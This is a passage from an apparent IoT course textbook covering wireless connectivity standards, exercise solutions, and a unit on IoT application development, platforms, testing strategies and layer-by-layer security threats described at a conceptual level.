It is an IEEE standard protocol used to establish wireless personal area networks (WPAN). It is
used for providing low cost, low speed, ubiquitous networks between devices. It is also known as
Low-Rate wireless Personal Area Network (LR-WPAN) standard. It makes use of the first two
layers (Physical and MAC layers) of the network stack and operates in ISM band. These
standards are also used with communication protocols of higher levels like- ZigBee, 6LoWPAN,
etc.

6LoWpan

11
IPV6 over low power wireless personal area network, is a standard for wireless communication.
It was the first standard created for IoT. It allows small, limited processing capabilities and low
power IoT devices to have direct connectivity with IP based servers on the internet. It also allows
IPV6 packets to be transmitted over IEEE 802.15.4 wireless network.

ZigBee

It is a wireless technology based on IEEE 802.15.4 used to address needs of low-power and low-
cost IoT devices. It is used to create low cost, low power, low data rate wireless ad-hoc
networks. It is resistant to unauthorized reading and communication errors but provides low
throughput. It is easy to install, implement and supports a large number of nodes to be connected.
It can be used for short range communications only.

NFC

Near Field Communication (NFC) is a protocol used for short distance communication between
devices. It is based on RFID technology but has a lower transmission range (of about 10 cm). It
is used for identification of documents or objects. It allows contact less transmission of data. It
has shorter setup time than Bluetooth and provides better security.

Bluetooth

It is one of the widely used types of wireless PAN used for short range transmission of data. It
makes use of short range radio frequency. It provides data rate of appx 2.1 Mbps and operates at
2.45GHz. It is capable of low cost and low power transmission for short distances. Its initial
version 1.0 supported upto 732kpbs speed. Its latest version is 5.2 which can work upto 400m
range with 2 Mbps data rate.

Z-Wave

It is one of the standards available for wireless networks. It is interoperable and uses low
powered radio frequency communication. It is used for connecting to smart devices by
consuming low power. These Z-waves devices allow IoT devices to be controlled over the
internet. It is generally used for applications like home automation . It supports data rate of upto
100kbps. It also supports encryption and multi-channel.

RFID

12
Radio frequency identification (RFID) are electronics devices consisting of an antenna and a
small chip. This chip is generally capable of carrying data upto 2000 bytes. It is used to give
unique identification to an object. Its system is composed of reading device and RFID tags.
RFID tags are used to store data and identification information, which is then attached to the
object to be tracked. The reader is used to track presence of RFID tag when the object passes
through it.

Check your Progress 2

1. What is Gateway prefix ? Why it is needed.


2. State differences between IPv4 and IPv6.
3. Explain any three connectivity technologies.

Need to elaborate more on the above technologies?

9.9 SUMMARY
In this unit M2M and IoTtechnologies are discussed in detail. Machine-to-Machine is a
technology that allows connectivity between networking devices. IoT technology expands the
concept of M2M by creating large networks of devices in which devices communicate with one
another through cloud networking platforms. In order to implement IoT, components involved
are – sensors, network, analytics and actions (actuators). Some of the existing IoT identification
and data protocols are IPv4, IPv6, MQTT, XMPP, etc. Existing connectivity technologies used
for connecting devices are – Bluetooth, Zigbee, 802.15.4, RFID, etc.

References

1. “Internet of Things”, Dr.JeevaJose , 2018, Khanna Book Publishing Co. (P) LTD. ISBN:
978-93-86173-59-1.

13
Solutions to Check your Progress 1

1. IoT is a network of physical objects , called “Things” , embedded with hardware like -
sensors or actuators or software, for exchanging data with other devices over the internet.
With the help of this technology, it is possible to connect any kind of device like simple
household objects example- kitchen appliances, baby monitors, ACs, TVs, etc.

2. The various differences between IoT and M2M are –

M2M IoT

Machine 2 Machine Internet of Things

Point to point connection establishment Devices are connected through the


network and also supports connecting
to global cloud networks.

Limited amount of intelligence Decision making is enabled

Makes use of internet protocols like- Makes use of traditional


HTTP, FTP, etc. communication protocols

Generally may not rely on internet Generally Rely on internet connection


connection

Less scalable Highly scalable

3. The components involved in the implementation of IoT are –


a) Sensors - devices that are capable of collecting data from the environment. There are
various types of sensors available –temperature sensors, pressure sensors, RFID tags,
light intensity detectors, electromagnetic sensors, etc.
b) Network - Data collected from sensors are passed over the network for computations
to the cloud or processing nodes.
c) Analytics - The process of generating useful insights from the data collected by
sensors is called analytics.

14
a) Action - Information obtained after analytics must be either passed to the user using
some user interface, messages, alerts, etc; or may also trigger some actions with the
help of actuators.

Solutions to Check your Progress 2

1. Gateways connect IoT LANs and WANs together. It is responsible for forwarding
packets between them on the IP layer. Since a large number of devices are connected,
address space needs to be conserved. Each connected device needs a unique address. IP
addresses allocated to devices within a gateway's jurisdiction are valid only in its domain.
Same addresses may be allocated in another gateway’s domain. Hence to maintain
uniqueness, each gateway is assigned a unique network prefix. It is used for global
identification of gateways.

2. Both IPv4 and IPv6 are network layer protocols. Some of the differences are –

IPv4 IPv6

Its length is 32 bits Its length is 128 bits

Possible number of addresses are 232 Possible number of addresses are 2128

It is represented in dotted decimal It is represented in hexadecimal notation


notation

IPsec is optional IPsec is compulsory

It supports manual or DHCP It supports auto-configuration


configuration
3. V
arious connectivity technologies are –

a) IEEE 802.15.4 - It is an IEEE standard protocol used to establish wireless personal


area networks (WPAN). It is used for providing low cost, low speed, ubiquitous
networks between devices.
b) 6LoWpan - IPV6 over low power wireless personal area network, is a standard for
wireless communication. It was the first standard created for IoT. It allows small,

15
limited processing capabilities and low power IoT devices to have direct connectivity
with IP based servers on the internet.
c) RFID - Radio frequency identification (RFID) are electronics devices consisting of an
antenna and a small chip. This chip is generally capable of carrying data upto 2000
bytes. It is used to give unique identification to an object.

16
UNIT 10 IoT APPLICATION DEVELOPMENT
Structure

10.0 Introduction
10.1 Objectives
10.2 IoT Application Essential Requirements
10.3 Challenges in IoT Application Development
10.4 IoT Application Development Framework
10.5 Open Source IoT Platforms
10.5.1 Popular Open Source IoT Platforms
10.5.2 Some Tools for Building IoT Prototypes
10.6 IoT Application Testing Strategies
10.6.1 Performance Testing
10.6.2 Security Testing
10.6.3 Compatibility Testing
10.6.4 End-User Application Testing
10.6.5 Device Interoperability Testing
10.7 Security Issues in IoT
10.7.1 Counter Measures
10.8 Summary
10.9 Solutions/Answers
10.10 Further Readings

10.0 INTRODUCTION

In the earlier unit, we had studied various IoT networking and connectivity
technologies. After going through the basics of IoT in previous units, we will
concentrate on IoT Application Development in this unit.

When you are developing some application, Platform is one which allows you
to deploy and run your application. A platform could be a hardware plus
software suite upon which other applications can operate. Platform could
comprise hardware above which Operating system can reside. This Operating
system will allow application to work above it by providing necessary
execution environment to it.

IoT application platforms provide a comprehensive set of generic, i.e.


application independent functionalities which can be used to build IoT
applications. When there is only one communication link between devices of
one type with another device of same type then, a system of specific service
can be set up. But in case of communication among devices of multiple types,
there is a need of some common standard application platform which hides
heterogeneity of various devices by providing a common working environment
to them.

1
Application
Development,
An IoT application platform is a virtual solution, means it resides over cloud.
Fog Computing and
Case Studies Data is the entity that drives business intelligence and every device has
something to talk with other device that is data. By means of cloud
connectivity, IoT application platform translates such devices data into useful
information. So it provides user means to implement business use cases and
enables predictive maintenance, pay-per-use, analytics and real time data
management. Thus, IoT application platforms provide a complete suite for
application development to its deployment and maintenance.

In this unit we will focus on IoT Application requirements, challenges of IoT


Application development, IoT Application Development Frameworks, Open
Source platforms for developing IoT applications, Tools for designing and
developing IoT application prototypes, IoT application testing strategies and
towards the end we will study the security issues in IoT systems.

10.1 OBJECTIVES

After going through this unit, you shall be able to:

 understand various requirements for IoT application development;


 list and describe various challenges of IoT application development;
 describe the application development frameworks;
 discuss various types of tools and open source IoT development
platforms
 elucidate the testing strategies to be followed for IoT system testing;
and
 explain security issues in IoT systems.

10.2 IoT APPLICATION ESSENTIAL


REQUIREMENTS

The nature of the technology architecture contributes to the essential


requirements of IoT applications. Based on the characteristics of the IoT
technology ecosystem such as heterogeneity, enormous scale, high volume of
data and dynamism, a set of essential requirements for IoT applications is
described. These requirements combined with quality attributes can be used to
develop a set of high-level requirements for IoT applications. The list is not
exhaustive but includes the vitally essential requirements.

10.2.1 Adaptability

IoT systems will consist of several nodes, which will be resource constrained
mobile and wirelessly connected to the Internet. Due to the factors such as
poor connectivity and power shortage, nodes can be connected and
disconnected from the system arbitrarily. Furthermore, the state, location and
computing speed of these nodes can change dynamically. All these factors can
2
IoT Application
make IoT systems to be extremely dynamic. In a physical environment that is Development

highly dynamic, IoT application needs to be self-adaptive to manage the


communication between the nodes and the services using them. IoT
applications need to designed and developed in a way that it can efficiently and
effectively react in a timely manner to the continuously changing context in
accordance with, for instance, business policies or performance objectives that
are defined by humans. IoT applications should be self-optimizing, self-
protecting, and self-configuring, resilient and energy-efficient.

10.2.2 Intelligence

Intelligent things and system of systems are the building blocks of IoT. IoT
applications will power IoT enabling technologies in transforming everyday
objects into smart objects that can understand and obtain intelligence by
making or enabling context-related decisions, resulting in the execution of
tasks independently without human intervention. Achieving this requires IoT
application to be designed and developed with intelligent decision-making
techniques such as context-aware computing service, predictive analytics,
complex event processing and behavioural analytics.

10.2.3 Real time

A number of IoT domains requires the timely delivery of data and services. For
instance, consider IoT in scenarios such as telemedicine, patient care and
vehicle-to-vehicle communications where a delay in seconds can have
dangerous consequences. Environments, where operations are time-critical,
will require IoT applications that provide on-time delivery of data and services.

10.2.4 Security

Privacy, trust, confidentiality and integrity are considered important security


principles for IoT due to the large number of devices, services and people
connected to the Internet. These principles are the top priority and essential
requirements for IoT applications. Since the IoT application uses data in
various forms, speed and from a variety of sources, it is important it
incorporates trust mechanisms that enforce privacy and confidentiality. In
addition, IoT application must integrate mechanisms to check for the integrity
of data to avoid the erroneous operation of IoT applications.

10.2.4 Regulation compliant

IoT applications may collect sensitive personal information about people's


daily activities such as detailed household energy usage profile and travel
history. Many people consider this information as confidential. When such
information is exposed to the Internet, there is a possibility of privacy leakage,
and this could affect the privacy of the individual. In order not to violate the
privacy of people, IoT applications must be compliant with the privacy
requirements established by law such as data protection rules, otherwise, they
could be prohibited.
3
Application
Development,
Fog Computing and 10.3 CHALLENGES IN IoT APPLICATION
Case Studies
DEVELOPMENT

IoT’s application requirements as previously described combined with the


inherent qualities of the IoT technology infrastructure makes the development
of IoT application, not an easy task. These characteristics create a set of
challenges for the IoT application stakeholders as discussed below.

10.3.1 Inherently distributed

IoT applications are typically distributed across several component systems.


Basically, some IoT application components will be implemented in the
cloud/fog. While functionalities such as real-time analysis and data acquisition
are implemented in the IoT device, the application components that allow the
end users to interact with the IoT system will be implemented, usually as a
separate web, mobile or standalone application. IoT applications may also be
distributed over a wide and varying geographical are. As they are distributed,
the classical approach of a centralised development methodology dealing with
all these software components may no longer be applicable. In addition,
designing and implementing distributed applications capable of taking
consistent decisions from non-centralised resources is not always an easy task.

10.3.2 Deep Heterogeneity

One of the major challenges in the realisation of IoT applications is the


interoperability among IoT devices using a variety of technologies. IoT
applications involve interactions among heterogeneous devices, providing and
consuming services deployed in a heterogeneous network (such as fixed,
wireless and mobile). This heterogeneity emanates not only from the difference
in features and capabilities but also for other reasons such as the
manufacturer's and vendors' products and quality of service requirements since
they do not always follow the same standards and protocols. Device and
communication heterogeneity can make the portability of IoT applications
difficult to achieve.

10.3.3 Data Management

The data generated from these heterogeneous devices are generally in huge
volume, in various forms, and are generated at different speeds. IoT
applications will often make critical decisions based on the data collected and
processed. Sometimes, these data can be corrupted for various reasons such as
the failure of a sensor, introduction of an invalid data by a malicious user,
delay in data delivery and wrong data format. Consequently, IoT application
developers are faced with the challenge of developing methods that establish
the presence of invalid data and new techniques that capture the relationship
between the data collected and the decision to be made.
4
IoT Application
10.3.4 Application Maintenance Development

IoT applications will be executed on distributed systems consisting of millions


of devices interacting in rich and complex ways. Since IoT applications will be
distributed over a wide geographical area, there are concerns relating to the
feasibility of application deployment that supports corrective and adaptive
maintenance. The codes running on these devices will have to be debugged and
updated regularly. However, maintenance operations present a number of
challenges. Allowing devices to support remote debugging and application
updates poses significant privacy and security challenges. In addition,
interactive debugging may be difficult due to the limited bandwidth of these
devices.

10.3.5 Humans in the Loop

Many IoT applications are human-centric applications, i.e. humans and objects
will work in synergy. However, the dependencies and interactions between
humans and objects are yet to be fully harmonized. Humans in the loop have
their advantages. For example, in healthcare, incorporating models of various
human activities and assisted technologies in the homes of the elderly can
improve their medical conditions. However, IoT applications that model
human behavior is a significant challenge, as it requires modeling of complex
behavioral, psychological and physiological aspects of human nature. New
research is necessary to incorporate human behaviors in IoT application design
and to understand the underlying requirements and complex dependencies
between IoT applications and humans.

10.3.6 Application Inter-dependency

An inter-dependency problem may arise when several IoT applications share


services from real-world objects. Consider two IoT applications running
concurrently in a home: an energy management application for regulating the
energy consumption of the electrical and electronic appliances and a health-
care application for monitoring the vital signs of the occupants of the house.
To reduce the cost of deployment and channel contention, these applications
share the information from the sensors in the home. However, integrating both
applications is challenging since each application has its own assumptions
about the real world and may have no knowledge of how the other application
works. For example, the home health care application may detect depression
and decide to turn ON all the lights. On the other hand, the energy
management application may decide to turn OFF lights when no motion is
detected. Detecting and resolving such dependency problems is important for
the correctness of operation of interacting IoT systems.

10.3.7 Multiple Stakeholders concern

The development of IoT applications involves various stakeholders with


different and sometimes conflicting concerns and expectations. The
5
Application
Development,
stakeholders of IoT application development include domain expert, software
Fog Computing and
Case Studies designer, application developer, device developer and network manager. These
stakeholders have to address issues that are attributed to the life-cycle phases
of an IoT application such as design, implementation, deployment and
evolution. The lack of mechanisms to address the concerns of the various
stakeholders and the special skill and expertise required by the stakeholders to
identify components and to understand the system contributes to the challenges
facing IoT application development.

10.3.8 Quality evaluation

Since IoT applications are currently being integrated into the daily activities of
our lives and sometimes used in critical situations with little or no tolerance for
errors and failures, it therefore means that the overall system quality is
important and must be thoroughly evaluated to guarantee that it is of high
quality before being deployed. However, evaluating quality attributes such as
performance is a key challenge since it depends on the performance of many
components as well as the performance of the underlying technologies.

10.4 IoT APPLICATION DEVELOPMENT


FRAMEWORK

Having studied the IoT application development requirements and challenges


let us focus on the layered approach of IoT application development
framework in this section.

IoT devices are becoming an integral part of organizations, homes, offices,


factories, hospitals, and almost everywhere. Today there are billions of IoT
devices that are using embedded systems, such as sensors, processors,
communication hardware, and other equipment, to send, collect, and act on
data without much human intervention. However, IoT is not a simple
technology. It is an amalgam of different technologies that work together in
harmony. IoT frameworks have a crucial role in the smooth operation of IoT
devices.

The fundamental components as shown in Figure 1 of IoT framework


comprises of Device Hardware (includes sensors, controllers, micro-
controllers, and other hardware devices), Device Software (involves written
applications to configure controllers and operate them from the remote and do
more), Communications/ Connectivity (communication and connectivity
mechanisms and protocols), Cloud Platform and Cloud Applications whose
details are given below:

6
IoT Application
Development

Figure 1: Framework for IoT Application Development

10.4.1 Device Hardware

Device Hardware is the first layer of IoT technology stack that defines the
digital and physical parts of any smart connected product. In this stacked layer,
it is imperative to know the implications of size, deployment, cost, useful
lifetime, reliability and more such. If we talk about small devices like for
example, smartwatches then you may have only one room for such a System
on a Chip (SoC). Here, you will need embedded computer like Raspberry-Pi,
Artik module, and BeagleBone board.

10.4.2 Device Software

The device software is the component that turns the device hardware into a
“smart device.” Device software is the second layer of the IoT technology
stack. Device software enables the concept of “software-defined hardware,”
meaning that a particular hardware device can serve multiple applications
depending on the embedded software it is running. It allows you to implement
communication with the Cloud or other local devices. You can perform real-
time analytics, data acquisition from your device’s sensors, and even control.

This layer of the IoT technology stack is critical because it serves as the glue
between the real world (hardware) and your Cloud Applications. You can also
use device software to reduce the risks of hardware development. Building
hardware is expensive, and it takes a lot longer than software. Instead of
building your device for a narrow and specific purpose, it is better to use the
generic hardware that can be customized by your device software to give you
more flexibility down the road. This technique is often known as “software-
defined hardware.” This way, you can update your embedded software
remotely via the Cloud, which will update your “hardware” functionality in the
field.

.The device software layer can be distributed into two categories i.e. Device
Operating System and Applications.

10.4.2.1 Device Operating system

The whole complexity of your IoT solution will portray the type of operating
system you are in the need of. There are some top things that you must include
like when your app requires a real-time operating system, I/O support, and
7
Application
Development,
support for the full TCP/IP stack. Some examples of an embedded OS are
Fog Computing and
Case Studies Brill, Linux, Windows Embedded and VxWorks.

10.4.2.2 Device Applications

Device applications run on top of the Edge OS and provide the specific
functionality for your IoT solution. Here the possibilities are endless. You can
focus on data acquisition and streaming to the Cloud, analytics, local control,
etc.

10.4.3 Communications /Connectivity

Communications refer to all the different ways your device will exchange
information with the rest of the world. Communications are the third layer of
the IoT technology stack. Depending on your industry, some people refer to
this layer of the IoT technology stack as connectivity. Communications include
both physical networks and the protocols you will use. It is true that the
implementation of the communications layer is found in the device hardware
and device software. But from a conceptual model, selecting the right
communication mechanisms is a critical part of your IoT product strategy. It
will determine not only how you get data in and out from the Cloud (for
example, using Wi-Fi, WAN, LAN, 4G, 5G, LoRA, etc.), but also, how you
communicate with third-party devices too.

In the connectivity part of the IoT technology stack, it is important to define


the network communication platforms that will be getting connected to the
sensors on the product hardware to the cloud and then to the application. The
communication part at this stage refers to all the diverse ways where your
device will be exchanging information with the whole world. This will include
physical networks and the type of protocols that you will be using. It is truly
said that the communication mechanisms are connected to the hardware of the
device software. Some of the Communication Protocols are -

 Infrastructure (ex: 6LowPAN, IPv4/IPv6, RPL)


 Identification (ex: EPC, uCode, IPv6, URIs)
 Comms / Transport (ex: Wifi, Bluetooth, LPWAN)
 Discovery (ex: Physical Web, mDNS, DNS-SD)
 Data Protocols (ex: MQTT, CoAP, AMQP, Websocket, Node)
 Device Management (ex: TR-069, OMA-DM)
 Semantic (ex: JSON-LD, Web Thing Model)
 Multi-layer Frameworks (ex: Alljoyn, IoTivity, Weave, Homekit)

10.4.4 Cloud Platform

The cloud platform is the backbone of your IoT solution. If you are familiar
with managing SaaS offerings, then you are well aware of the role of this layer
of the IoT technology stack. A cloud platform provides the infrastructure that
supports the critical areas like data collection and management, analytics and
cloud APIs.

8
IoT Application
10.4.4.1 Data Collection Development

This is an important aspect. Your smart devices will stream information to the
Cloud. As you define the requirements of your solution, you need to have a
good idea of the type and amount of data you will be collecting on a daily,
monthly and yearly basis. One of the challenges of IoT applications is that they
can generate an enormous amount of data. You need to make sure you define
your scalability parameters so that your architects can determine the right data
management solution from the very beginning.

10.4.4.2 Analytics

It is one of the critical component of IoT solution. Analytics refers to the


ability to find patterns, crunch data, perform forecasts, integrate machine
learning and more. It has the capability to find out the insights from your data
that will make your solution valuable. Analytics can be as simple as data
aggregation and display or can be as elaborate as using machine learning or
artificial intelligence.

10.4.4.3 Cloud APIs

The Internet of Things is all about connecting devices and sharing data, which
you can achieve by exposing APIs at either the Cloud level or the device level.
Cloud APIs allow your customers and partners to either interact with your
devices or to exchange data. Remember that opening an API is not a technical
decision; it’s a business decision.

10.4.5 Cloud Applications

The fifth layer of the IoT technology stack is the Cloud Applications layer.
Your end-user applications are the part of the system that your customers will
see and interact with. These applications will most likely be web-based, and
depending on your user needs, you might need separate apps for desktop,
mobile, and even wearables. Even though a smart device has its own display,
the user may likely use a cloud application as their main point of interaction
with your solution. This allows them to have access to your smart devices
anytime and anywhere, which is part of the goal of having connected devices.
While designing end-user applications, it is very important to understand who
your user is and what is his/her primary goal of using the product. The other
consideration is that for Industrial IoT (IIoT) applications, you’ll probably
have more than one user.

Applications can also be divided into customer-facing versus internal apps.


Customer-facing applications usually get the most attention, but in the case of
IoT, internal applications are equally important. These include applications to
remotely provision and troubleshoot devices, monitor the health of your device
fleet, report on performance and predictive maintenance, etc.

9
Application
Development,
These internal apps will require a deep understanding of your external and
Fog Computing and
Case Studies internal customers and will require the right prioritization and resourcing.

In the next section let us study open source platforms and some prototype tools
available for IoT Application Development.

10.5 OPEN SOURCE IoT PLATFORMS

For understanding an open-source IoT platform, we will ponder on the below


three points:

(i) Each consumer desires to utilize any IoT device of their preference
without being restricted or bound to a specific product vendor. For
example, some smart devices need to be clubbed with only
smartphones from the same retailer.
(ii) All business companies of IoT devices desire to integrate their
particular devices with ease and diverse ecosystems.
(iii)All application developers desire their apps back multiple IoT devices,
which need not demand to blend the specially developed vendor-
specific codes.

The open-source framework is a one-stop solution to the above constraints, and


it enables scalability and superior levels of flexibility. Many open-source IoT
frameworks can be downloaded for free and installed quite straightforwardly
across your applications.

10.5.1 Popular Open Source IoT Platforms

Following are some of the popular Open Source IoT platforms:

Kaa

Kaa IoT Platform is one the most efficient and rich open-source Internet of
Things cloud platforms where anyone has a free way to materialize their smart
product concepts. On this platform, you can manage an unlimited number of
connected devices with cross-device interoperability.

You can achieve real-time device monitoring with the possibility of remote
device provisioning and configuration. It is one of the most flexible IoT
platforms for your business which is fast, scalable, and modern.

Macchina.io

Macchina.io platform provide a web-enabled, modular, and extensible


JavaScript and C++ runtime environment for developing IoT gateway
applications. It also supports a wide variety of sensors and connection
technologies including Tinkerforge, bricklets, Xbee, and many others including
accelerometers. This platform is able to develop and deploy device software
10
IoT Application
for automotive telematics and V2X, building and home automation, industrial Development

edge computing and IoT gateways, smart sensors, or energy management


systems.

Zetta

Zetta is a server-oriented platform that has been built around NodeJS, REST,
and a flow-based reactive programming development philosophy linked with
the Siren hypermedia APIs. They are connected with cloud services after being
abstracted as REST APIs. People believe that the Node.js platform is best to
develop IoT frameworks. These cloud services include visualization tools and
support for machine analytics tools like Splunk. It creates a zero-distributed
network by connecting endpoints such as Linux and Arduino hacker boards
with platforms such as Heroku. Key features are:

 Runs everywhere, including cloud, PCs, or single-board computers.


 Can turn any device into an API.
 Create geo-distributed networks by linking PCs, BeagleBones, and
Raspberry Pis with cloud platforms, such as Heroku.
 Optimized to stream real-time, data-intensive applications.
 Supports almost all device protocols.

DeviceHive

It is yet another feature-rich open-source IoT platform that is currently


distributed under the Apache 2.0 license and is free to use and change. It
provides Docker and Kubernetes deployment options and can be downloaded
and use with both public and private cloud. It allows you to run batch analytics
and machine learning on top of your device data and more. Various libraries,
including Android and iOS libraries, are supported in DeviceHive. Key
features are:

 Compatible with Java, Python, Node.js, iOS, Android, and other


libraries.
 Usable with public, private, or hybrid cloud networking.
 Connects devices via HTTP, WebSockets, or MQTT.
 Offers few deployment options, i.e., Docker, Docker Compose, and
Kubernetes.
 Provides rich support for big data analytics.

Distributed Services Architecture (DSA)

DSA is an open-source IoT that unifies the separate devices, services, and
applications in the structured and real-time data model and facilitates
decentralized device inter-communication, logic, and applications. Distributed
service links are a community library that allows protocol translation and data
integration to and from 3rd part data sources. All these modules are lightweight

11
Application
Development,
making them more flexible in use. It implements DSA query DSL and has
Fog Computing and
Case Studies inbuilt hardware integration support.

Google Cloud Platform

Developers can code, test and deploy their applications with highly scalable
and reliable infrastructure that is provided by Google and Google itself uses it.
Developers have to just pay attention to the code and Google handles issues
regarding infrastructure, computing power and data storage facility.

Google is one of the popular IoT platform because of: Fast global network,
Google's BigData tool, Pay as you use strategy, Support of various available
services of cloud like RiptideIO, BigQuery, Firebase, PubSub, Telit Wireless
Solutions, Connecting Arduino and Firebase and Cassandra on Google Cloud
Platform and many more.

10.5.2 Some Tools for Building IoT Prototypes

IoT opened many new horizons for companies and developers working for the
development of IoT systems. Many exceptional products have been developed
due to IoT app development. Companies providing Internet of Things solution
are creating hardware and software designs to help the IoT developers to create
new and remarkable IoT devices and applications. Some of the tools to build
IoT prototypes and applications are discussed below:

Arduino

Arduino is an Italy based IT company that builds interactive objects and


microcontroller boards. It is an open-source prototyping platform that offers
both IoT hardware and software. Hardware specifications can be applied to
interactive electronics and software includes Integrated Development
Environment (IDE). It is the most preferable IDEs in all IoT development
tools. This platform is easy and simple to use.

Raspbian

This IDE is created for Raspberry Pi board. It has more than 35000 packages
and with the help of precompiled software, it allows rapid installation. It was
not created by the parent organization but by the IoT tech enthusiasts. For
working with Raspberry Pi, this is the most suitable IDE available.

Eclipse IoT

This tool or instrument allows the user to develop, adopt and promote open
source IoT technologies. It is best suited to build IoT devices, Cloud platforms,
and gateways. Eclipse supports various projects related to IoT. These projects
include open-source implementations of IoT Protocols, application frameworks
and services, and tools for using Lua programming language which is
promoted as the best-suited programming language for IoT.

12
IoT Application
Development

Tessel 2

It is used to build basic IoT prototypes and applications. It helps through its
numerous modules and sensors. Using Tessel 2 board, a developer can avail
Ethernet connectivity, Wi-Fi connectivity, two USB ports, a micro USB port,
32MB of Flash, 64MB of RAM. Additional modules can also be integrated
like cameras, accelerometers, RFID, GPS, etc.

Tessel 2 can support Node.JS and can use the libraries of Node.JS. It contains
two processors, its hardware uses 48MHz Atmel SAMD21 and 580.

MHz MediaTek MT7620n coprocessor. One processor can help to run


firmware applications at high speed and the other one helps in the efficient
management of power and in exercising good input/output control.

Platform IoT- IDE

It is a cross-platform IoT IDE. It comes with the integrated debugger. It is the


best for mobile app development and developers can use a friendly IoT
environment for development. A developer can port the IDE on Atom editor or
it can install it as a plugin. It is compatible with more than 400 embedded
boards and has more than 20 development frameworks and platforms. It offers
a remarkable interface and is easy to use.

Kinoma

It is a Marvell semiconductor hardware prototyping platform. It enables three


different projects. To support these projects two products are available Kinoma
Create and Element Board. Kinoma Create is a hardware kit for prototyping
electronic and IoT enabled devices. Kit contains supporting essentials like
Bluetooth Low Energy (BLE), integrated Wi-Fi, speaker, microphone and
touch screen. Element Board is the smallest JavaScript-powered IoT product
platform.

10.6 IoT APPLICATION TESTING STRATEGIES

Testing is very important phase after the application development is


completed. The following are the essential types of tests (as shown in Figure 2)
recommended for an IoT application.

13
Application
Development,
Fog Computing and
Case Studies

Figure 2: IoT Application Testing Strategies

10.6.1 Performance Testing

Performing testing is usually conducted so as to determine how rapid the


functioning of a communication network model is. This testing also looks into
the computation capabilities of the internal part of the software system.

This IoT Performance testing framework is usually done at 3 levels:

 The Network and Gateway level, which involves protocols such as


HTTP and MQTT
 The System level
 The Application level

A good example of Performance IoT testing is the verification of response time


against a specific bench-marked time, with specifically defined connectivity
settings.

10.6.2 Security Testing

The security testing aspect of the IoT framework deals with security elements,
such as the protection of data, as well as encryption and decryption. It is aimed
at providing added security to connected devices, and also to the networks and
cloud services on which the devices are connected.

Some variables that mostly cause security threats in IoT are sensor networks,
applications that work to collect data, and interfaces. Therefore, it is highly
recommended that security testing be done at the device and protocol level,
since problems can easily be detected and solved at this level.

An example of security testing is the verification of no unauthorized access to


a particular device.
14
IoT Application
10.6.3 Compatibility Testing Development

The main purpose of compatibility testing is to validate all the possible


functional combinations of devices, their hardware, protocol and software
versions, as well as operating systems, such as the mobile OS versions.
This compatibility testing is usually done in two levels:

 The Application layer


 The Network layer

A good example of compatibility testing is verifying that a particular IoT


software supports a given set of devices.

10.6.4 End-User Application Testing

The End-user application testing takes into consideration the user experience,
as well as the usability and functionality of the IoT application.

An example of this IoT testing framework is the verification of an IoT


application, so as to ensure that it includes all required features, and in a good
working condition as well.

10.6.5 Device Interoperability Testing

This type of testing aims to assess the interoperability of protocols and devices,
compared with varying standards and specifications.

In other words, in an IoT framework, the device interoperability testing is


conducted so as to verify the connectivity of all devices and protocols.

This testing is usually done in the Service layer. This is because the service
layer provides the most conducive environment for this testing, that is; a
platform that is communicable, programmable and operable.

10.7 SECURITY ISSUES IN IoT

The IoT is diverse from traditional computers and computing devices, makes it
more vulnerable to security challenges in different ways:

 Many devices in the Internet of Things are designed for deployment on


a massive scale. An excellent example of this is sensors.
 Usually, the deployment of IoT comprises of a set of alike or nearly
identical appliances that bear similar characteristics. This similarity
amplifies the magnitude of any vulnerability in the security that may
significantly affect many of them.
 Similarly, many institutions have come up with guides for risk
assessment conduction. This step means that the probable number of
links interconnected between the IoT devices is unprecedented. It is

15
Application
Development,
also clear that many of these devices can establish connections and
Fog Computing and
Case Studies communicate with other devices automatically in an irregular way.
These call for consideration of the accessible tools, techniques, and
tactics which are related to the security of IoT.

Even with the issue of security in the sector of information and technology not
being new, IoT implementation has presented unique challenges that need to
be addressed. The consumers are required to trust the Internet of Things
devices and the services are very secure from weaknesses, particularly as this
technology continues becoming more passive and incorporated in our everyday
lives. With weakly protected IoT gadgets and services, this is one of the very
significant avenues used for cyber attacks as well as the exposure of the data of
users by leaving data streams not protected adequately. The nature of the
interconnection of the IoT devices means if a device is poorly secured and
connected it has the potential of affecting the security and the resilience on the
Internet internationally. This behavior is simply brought about by the challenge
of the vast employment of homogenous devices of IoT. Besides the capability
of some devices to be able to mechanically bond with other devices, it means
that the users and the developers of IoT all have an obligation of ensuring that
they are not exposing the other users as well as the Internet itself to potential
harm. A shared approach required in developing an effective and appropriate
solution to the challenges is currently witnessed in the IoT.

When it comes to authentication, for instance, IoT faces various vulnerabilities,


which remain one of the most significant issues in the provision of security in
many applications. The authentication used is limited in how it protects only
one threat, such as Denial of Service (DoS) or replay attacks. Information
security is one of the significant vulnerable areas in the authentication of IoT
due to the prevalence of applications which are risky due to their natural
multiplicity of data collection in the IoT environment. If we can, for instance,
take an example of contactless credit cards. These cards are capable of
permitting card numbers and names to be read without the authentication of
IoT; this makes it possible for hackers to be able to purchase goods by using a
bank account number of the cardholder and their identity.

One of the most prevalent attacks in the IoT is the man in the middle, where
the third-party hijack communication channel is aimed at spoofing identities of
the palpable nodes which are involved in network exchange. Man in the middle
attack effectively makes the bank server recognize the transaction being done
as a valid event since the adversary does not have to know the identity of the
supposed victim.

In this section let us discuss the security issues layer-wise in an IoT


Architecture. IoT systems can be broadly described using a basic three layer
architecture namely Perception layer, Gateway layer and Cloud layer.

16
IoT Application
Perception layer: The Perception layer is the typical external physical layer, Development

which includes sensors for sensing and gathering information about the
surrounding environment such as temperature, humidity, pressure etc..Table 1
shown below depicts the major threats in the Perception layer:
Table 1:Threats in the Perception Layer

Name of Description
the Threat
Denial of IoT sensing nodes have limited capacity and capabilities thus attackers can
Service use Denial of Service attack to stop the service. Eventually servers and the
Attack devices will be unable to provide its service for users.

Hardware Attacker can damage the node by replacing the parts of the
Jamming node hardware.
Insertion of Attacker can insert a falsified or malicious node between the actual nodes
Forged of the network to get access and get control over the IoT network.
nodes
BruteForce As the sensing nodes contains weaker computational power brute force
Attack attack can easily compromise the access control of the devices.

Gateway layer: The Gateway layer is responsible for connecting to network


devices, interconnected smart devices and servers. Its features are also used for
transmitting and processing sensor data. Table 2 shown below depicts the
major threats in the Gateway layer:
Table 2: Threats in the Gateway Layer

Name of the Description


Threat
Denial of As this layer provide network connectivity by following a DOS attack,
Service servers or devices are unable to provide the services to the user.
Attack
Session Attackers can hijack the session and obtain the access to the network
Hijacking through this kind of attack.
attacks
Man in the Attacker can intersect the communication channel between two sensing
middle nodes and easily obtain classified information if there is no proper
(MIM) encryption mechanism in place.
attacks

